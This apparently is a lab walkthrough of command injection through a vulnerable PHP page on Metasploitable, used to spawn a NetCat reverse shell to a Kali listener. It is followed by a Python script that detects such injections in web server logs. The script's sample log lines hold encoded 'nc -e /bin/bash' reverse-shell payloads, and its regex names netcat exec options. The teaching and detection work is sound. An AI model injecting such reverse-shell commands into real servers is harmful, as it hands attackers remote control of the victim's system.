Thursday, April 12, 2018

Command Injection (II): Reverse shell connection with NetCat


- Layout for this exercise:

- This exercise is based on the previous one:

- Now, the goal is to perform a Command Injection attack from the web browser of the attacker (Kali Linux) against the victim (Metasploitable), injecting NetCat commands:

Three of the most interesting characteristics of this attack are:

  • No file is uploaded to the victim, so the detection rate would be low
  • No need for write permissions on the web server folder on the victim's side
  • The tool (NetCat) is usually present on most Linux/Windows machines

- First, let's check that ci.php (which allows Command Injection due to lack of input sanitization, as seen in the previous exercise) is available on the victim side, in Metasploitable's web server folder /var/www:

- From Kali:

- NetCat (nc) has two options (-c and -e), flagged as dangerous in the program's own help text, that execute a command once a connection is established:

- Setting a listening session on port 4444 at the attacker side:

- Now, entering through Kali's browser the NetCat command that executes (-e) a shell (/bin/bash) on the remote side:

- Note the browser's Connecting notification, meaning it is waiting for the connection at the other side:

- Finally, the attacker Kali achieves a reverse shell connection from the Metasploitable victim's side:
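Even though no file is written to the victim, the injected request itself is still visible in the web server's access log. As an added example (not part of the original post), the following Python script scans constructed Apache access-log lines for this kind of injection: a shell metacharacter followed by a netcat binary with the -e or -c option, after URL-decoding the query string. The parameter name ip, the client addresses and the log paths are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache access-log sample (not from the original post).
# The parameter name "ip" and all addresses are hypothetical.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2018:10:01:02 +0000] "GET /ci.php?ip=127.0.0.1 HTTP/1.1" 200 312
10.0.0.7 - - [12/Apr/2018:10:01:09 +0000] "GET /ci.php?ip=127.0.0.1%3B+nc+-e+%2Fbin%2Fbash+10.0.0.7+4444 HTTP/1.1" 200 0
10.0.0.7 - - [12/Apr/2018:10:01:15 +0000] "GET /ci.php?ip=127.0.0.1%7Cnc.traditional+-c+%2Fbin%2Fsh+10.0.0.7+4444 HTTP/1.1" 200 0
10.0.0.9 - - [12/Apr/2018:10:02:00 +0000] "GET /index.php?page=nc_guide HTTP/1.1" 200 1024
"""

# Common log format: client, identity, user, [timestamp], "METHOD path PROTO", status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3})')

# A shell metacharacter (command chaining) followed by a netcat binary name
# and the -e / -c option the post describes as dangerous.
NETCAT_EXEC_RE = re.compile(
    r'[;|&`$(]\s*(?:nc|ncat|netcat|nc\.traditional)\b[^;|&]*\s-(?:e|c)\s'
)


def decode_query(path):
    """URL-decode until the string stops changing, so that a double-encoded
    query is normalized before the pattern is applied."""
    prev, cur = None, path
    while prev != cur:
        prev, cur = cur, unquote_plus(cur)
    return cur


def find_netcat_injections(log_text):
    """Return (client_ip, timestamp, decoded_path) for every request whose
    query string chains a netcat -e/-c command after a shell metacharacter."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        client, ts, _method, path, _status = m.groups()
        decoded = decode_query(path)
        if NETCAT_EXEC_RE.search(decoded):
            hits.append((client, ts, decoded))
    return hits


if __name__ == "__main__":
    for client, ts, decoded in find_netcat_injections(SAMPLE_LOG):
        print(f"{ts} {client} -> {decoded}")
```

The benign request for /ci.php and the page named nc_guide are not reported; only the two requests that chain a netcat -e or -c command after ; or | are.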